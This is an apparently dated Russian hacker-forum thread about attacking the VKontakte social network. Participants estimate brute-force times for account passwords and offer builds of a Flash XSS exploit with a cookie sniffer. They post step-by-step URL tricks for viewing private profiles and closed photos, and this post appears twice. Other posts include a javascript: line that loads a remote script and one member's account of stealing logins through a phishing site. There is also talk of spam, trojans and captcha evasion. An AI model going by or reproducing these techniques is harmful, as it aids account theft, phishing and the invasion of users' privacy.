молчу)) но всетаки какието сымволы проходят.. можно попробвать обойти.

пс:

Как удалить свою страницу?
http://vkontakte.ru/topic81011

Национальный справочник
http://vkontakte.ru/reg0

не подскажите, как долго брутить 9-значный пароль из латиницы (большие и маленькие буквы) и цифры, но без спецсимволов?

ппц..) все зависит от машины. от словаря. от самого брута. вообщем долго.. ;)

9 символов - 1.0155995 ×10 в 14 степени вариантов. Время на брут: 32 года, 3 месяца, 7 дней, 12 часов, 11 минут :)

При 100000 паролей в секунду, учитывает 36-символьный алфавит (буквы + цифры)... В твоем же случае еще больше символов, следовательно дольше...

Есть еще желание брутить?)
Может лучше пинча? =)

P.s. Данные взяты с википедии, при желании могу дать ссылочку

ссылочку дай ради интереса, а спрашивал потому, что когда в контакте админы кому-нибудь меняют пароль (например после взлома аккаунта жертва жалуется в поддержку), то они всегда генерят пароли одного типа - 9 символов, состоит только из латинских букв (больших и маленьких) и цифр, правда цифры есть не всегда:
пример
FRRaLCioy
UUY8w41NP
и т. п.
посему и интересовало - стоит ли брутить...

Смотри 9 символов, из 26+26+10=56 вариантов, получаем перебор 52 в 9 степени значений. Т.е. если ты хочешь за месяц (30 дней) подобрать пароль, то тебе нужна скорость 2779905883635712 / 60*60*24*30 = 1 072 494 553 паролей в секунду, отсюда и решай ) Я бы не брутил

я не понимаю зачем вообще вам нужно брутить?ну только если из целей забрутить много акков на один и тотже пасс, а так СИ, трои, сплойты, Xss, фэйки и т.д. рулят!

брутить?
для спама..)

я же писал "ну только если из целей забрутить много акков на один и тотже пасс"

http://habrahabr.ru/blog/webdev/43883.html
читали?

да, уже висит 2й день в мировых новостях

Есть иформация что Одноклассники сотрудничают с ФЗБ (СБУ и тд.) Туда замешаны службы всех стран СНГ. Так что товарищи - думаем что пишем. Наверника ВК тоже не святой.

на мой взгляд ВК и одноклассники не прямые сайты ФЗБ, а Закрытые Акционерные Общества, которые активно сотрудничают с такими или иными службами

Одноклассники полюбому не спроста, хотя бы потому что как сегодня оказалось там надо подписывать фото каждого кто есть на фото. То есть например Админ, Грин и АМА ачата должны подписаться как "Я слева, в центре ...., справа удутый ..." и не как иначе... Хуле - все как по фильму Дух Времени, только немного видоизменено...

Сделаю нахаляву 8 билдов flash сплойта для контакта. Сам сплойт + сниффер (мой, т.к. не гарантирую, что на других пахать будет).
Отписываемся в личку или тут.
P.S. от плюсиков конечно же не откажусь)

ну как бы не сплойт, но универсальная xss тульза)) Будем говорить так)
Плюсики - просто так) Если захотят - поставят. Если нет - не надо.

хех))) Осталось всего 2 билда))

Буду рад билду))

Полный адрес до сниффера напиши в личку. http://host/sniffer.php в таком виде.

тоже буду рад :)

AdReNa1!Ne превысил(а) максимальный объем сохраненных персональных сообщений и не может получать новые сообщения, пока не удалит часть старых.
Скинь плиз в ПМ.

Знаю пару незначительных ошибок в приватности вконтакте.ру :

Для просмотра закрытого профиля требуется:

Узнать ID анкеты. Делается это просто, наводим мышку на "Друзья ИМЯ". Копируем ссылку.
*http://vkontakte.ru/friend.php?id=000000
Цифры после "id=" и есть ID профиля. Копируем эти цифры и вставляем в нужные нам ссылки:

Фотографии со мной:
_http://vkontakte.ru/photos.php?act=user&id=000000

Фотоальбомы:
_http://vkontakte.ru/photos.php?id=000000

Видеозаписи:
_http://vkontakte.ru/video.php?id=000000

Заметки:
_http://vkontakte.ru/notes.php?id=000000
Во всех записях можно оставлять комментарии.

С помощью данного сервиса можно в граффити вставлять свои картинки: (внимание! могут воровать пароли! http://q-zar.livejournal.com/151187.html)
_http://www.elets.net/vkontakte/?p=251012

В vkontakte.ru можно просматривать и закрытые фотографии
Если увеличение фотографии не возможно, и вам выдают табличку с текстом:
Вы не можете просматривать этот альбом, так как его владелец установил ограничения на просмотр для тех, кто не является его другом. Назад.

Копируем ссылку на изображение:
_http://cs52.vkontakte.ru/u2772114/4229389/s_1f77999320F3f.jpg

После в скопированной ссылке меняем букву перед знаком "_" на x :
_http://cs52.vkontakte.ru/u2772114/4229389/x_1f77999320F3f.jpg

Как скачать видеоролик с сайта vkontakte.ru
Заходим на страницу с водеоролдиком, в алресную строку браузер вставляем:

javascript:(function(){var s=document.createElement('script'); s.src='http://xantorohara.jino-net.ru/videovkontakte/videovkontakte.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })();

нажимаем на Download

Но, честно говоря, эта штука имхо немного не пашет, ибо скачивает она не ролик целиком. а лишь звук. ;)

( взято с сайта http://fenst.livejournal.com/302349.html )

Ещё есть такая фича, чтобы удалять человека с отмеченной фоторафии. Например пользователь Вася Пупкин отмечен на какойто фотографии. Нужно, чтобы Вася Пупкин был у вас в друзьях. И тогда отмечаем его ещё раз на этой фотографии. После этого у нас появляется кнопка с текстом - удалить. Всё, удаляем. Баги не значительные, но всё-же.

(это уже сам написал ^^)

Знаю пару незначительных ошибок в приватности вконтакте.ру :

Для просмотра закрытого профиля требуется:

Узнать ID анкеты. Делается это просто, наводим мышку на "Друзья ИМЯ". Копируем ссылку.
*http://vkontakte.ru/friend.php?id=000000
Цифры после "id=" и есть ID профиля. Копируем эти цифры и вставляем в нужные нам ссылки:

Фотографии со мной:
_http://vkontakte.ru/photos.php?act=user&id=000000

Фотоальбомы:
_http://vkontakte.ru/photos.php?id=000000

Видеозаписи:
_http://vkontakte.ru/video.php?id=000000

Заметки:
_http://vkontakte.ru/notes.php?id=000000
Во всех записях можно оставлять комментарии.

С помощью данного сервиса можно в граффити вставлять свои картинки: (внимание! могут воровать пароли! http://q-zar.livejournal.com/151187.html)
_http://www.elets.net/vkontakte/?p=251012

В vkontakte.ru можно просматривать и закрытые фотографии
Если увеличение фотографии не возможно, и вам выдают табличку с текстом:
Вы не можете просматривать этот альбом, так как его владелец установил ограничения на просмотр для тех, кто не является его другом. Назад.

Копируем ссылку на изображение:
_http://cs52.vkontakte.ru/u2772114/4229389/s_1f77999320F3f.jpg

После в скопированной ссылке меняем букву перед знаком "_" на x :
_http://cs52.vkontakte.ru/u2772114/4229389/x_1f77999320F3f.jpg

Как скачать видеоролик с сайта vkontakte.ru
Заходим на страницу с водеоролдиком, в алресную строку браузер вставляем:

javascript:(function(){var s=document.createElement('script'); s.src='http://xantorohara.jino-net.ru/videovkontakte/videovkontakte.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })();

нажимаем на Download

Но, честно говоря, эта штука имхо немного не пашет, ибо скачивает она не ролик целиком. а лишь звук. ;)

( взято с сайта http://fenst.livejournal.com/302349.html )

Ещё есть такая фича, чтобы удалять человека с отмеченной фоторафии. Например пользователь Вася Пупкин отмечен на какойто фотографии. Нужно, чтобы Вася Пупкин был у вас в друзьях. И тогда отмечаем его ещё раз на этой фотографии. После этого у нас появляется кнопка с текстом - удалить. Всё, удаляем. Баги не значительные, но всё-же.

(это уже сам написал ^^)
да ты просто хакер! ты взломал сайт...
эти скрипты уже по 20 раз выкладывали :mad:

k0lbasa исчобы ;)

Все, xss прикрыли. Только оооочень тупым способом))) Но цука действует)
заменили расширение .swf на .zip :D
Вообще xss до сих пор действует, только везде стоят ассоциации с .zip файлами.

=))))

тема брута аккаунтов вконтакте по списку еще актуальна? Если да, то плз повторно скиньте этот скрипт.

Все, xss прикрыли. Только оооочень тупым способом))) Но цука действует)
заменили расширение .swf на .zip :D
Вообще xss до сих пор действует, только везде стоят ассоциации с .zip файлами.
а как тогда флехи качать?

http://vkontakte.ru/note2503?oid=1

Полтора года назад, когда контакт только начал набирать обороты и функциональность там была никакой - кафедры и универы - можно было добавлять самим. Сейчас уже собрана база практически по всем учеб. заведениям - и функция добавления - подлежит премодерации или по заявке

Полтора года назад, когда контакт только начал набирать обороты и функциональность там была никакой - кафедры и универы - можно было добавлять самим. Сейчас уже собрана база практически по всем учеб. заведениям - и функция добавления - подлежит премодерации или по заявке
мда золотые времена контакта прошли

Мало того до прошлого лета работал баг, позволяющий любого человека загнать в свою группу с помощью обычного запроса. group и event не различались ..

я это делал группы набирались писец какие а уже не актуально давно + банят

с хэшем реально бред :Ъ

с каким хэшем?
ты в тему сказал)
ниочем))

Как такую фишку замутить? _http://vkontakte.ru/id14352346

Уже прикрыли такую фишку, как и все сложно с самим собой :(

Семейное положение:
День рождения: 35 декабря
Религ. взгляды: &amp;amp;amp;amp;amp;amp;gt;_

я се подобную фишку делал - семейное положение ПУСТОЕ,др какой хошь,религ взгляды...попробуйте(там будут все юзеры контакта)

А я так акаунты уганяю: сделал сайт(vkontakte.W6.Ru) и подсовываю эту ссылку ламеру:) говорю што это типа вконтакте 6 он вводит туда свои данные и они отправлятся на форму mail.Php пароль люська
ayola фишинг сайты удаляет...на своей ЖО проверял...

ayola фишинг сайты удаляет...на своей ЖО проверял...
ну тут поможет банальная СИ :) СИ рулит!

СИ НЕ всегда релит.... но смотря какой )

___________________________________
http://www.hash.ixces.ru/img.gif

не могу найти где подпись делать.... может я ударился головой? напишите если кто знает...

я се подобную фишку делал - семейное положение ПУСТОЕ,др какой хошь,религ взгляды...попробуйте(там будут все юзеры контакта)
Че-то попробывал - не катит

эту багу уже прикрыли

Тут многое уже не катит((( вот блин

кто может десктопную прогу напишет со всеми багами всместе + фак...

+трой

+трой
без троя) ну или приложение к файерфоксу

Нахрена?
Все что нужно уже есть в Статьях

да так если подумать, то на данный момент на ВК ничего нормального и нет т.к. всё хорошее прикрыли, а реально классного вообще нет :)

Спам был, есть будет.
Пока капчу не введут )))

Пока капчу не введут ))) ну и ее при желании можно обойти

ну и ее при желании можно обойти
если введут капчу это будет убей себя об стену... придется писать норм софт

если введут капчу это будет убей себя об стену... придется писать норм софт

Зачем Дурову вводить капчу? Это будет для него самоубийство, все юзеры уйдут туда где капчи нету, на одноклассники например

Зачем Дурову вводить капчу? Это будет для него самоубийство, все юзеры уйдут туда где капчи нету, на одноклассники например
время покажет...

да что за бред :ddd
представьте тут перед каждым сообщением надо будет капчу вводить все просто перебегут на другие порталы

ну при логине могут ввести капчу

я про логин и подрузамевал, ждите...((( мб...

сорри если туплю капча - это когда символы надо вводить с картинки?

да

понятно, в таком случае по мне это самый мудацкий способ защиты, кроме того и против нее есть методы, но вот например на Яндексе эта капча такая, что сам запаришься угадывать, на Гугле тоже кривая - считаю, что хорошая капча не должна затруднять обычному человеку пользоваться каким-либо сервисом, который, она вроде как защищает от ботов

не работает паблик спамер :((

напиши свой \= делов то...

угу в разработке) на самом деле ссылку забанили из за этого не постил

Кстати, xss прикрыли, как я и говорил, глупейшим образом. 10 минут посидел за флешем и теперь xss пашет. Только в ие, но с глюками небольшими...

ну и нормально, давай в личку выкладывай!

Вообщем есть такая фишка, незнаю поможет чем аль нет :) Напишу просто
Решил прикольнутся над другом. Зарегал новый аккаунт, где имя написал след. образом:
Aнтон, где буква A - на английской раскладке.
Фамилию написал русскими полность.
Кароче на своей страничке все отображается нормально, а если оставляю каменты, то первая буква А ( которая английская ) удаляется и остается только Нтон :)
Может кто че придумает :d

Интересно ,можно просмотреть удаленную страницу пользователя??)

А можно как нить взломать акуант?!

Вообщем есть такая фишка, незнаю поможет чем аль нет :) Напишу просто
Решил прикольнутся над другом. Зарегал новый аккаунт, где имя написал след. образом:
Aнтон, где буква A - на английской раскладке.
Фамилию написал русскими полность.
Кароче на своей страничке все отображается нормально, а если оставляю каменты, то первая буква А ( которая английская ) удаляется и остается только Нтон :)
Может кто че придумает :d

Тоже самое с моей фамилией произошло хотел сделать Романoff, но осталось только Роман :)

Что за чушь вы тут пишете... Ерундой занимаетесь.. Не разрушайте МоЗг - читайте статьи! Лучше придумайте - как взломать репутацию до голд статуса! :)

А можно как нить взломать акуант?!
:d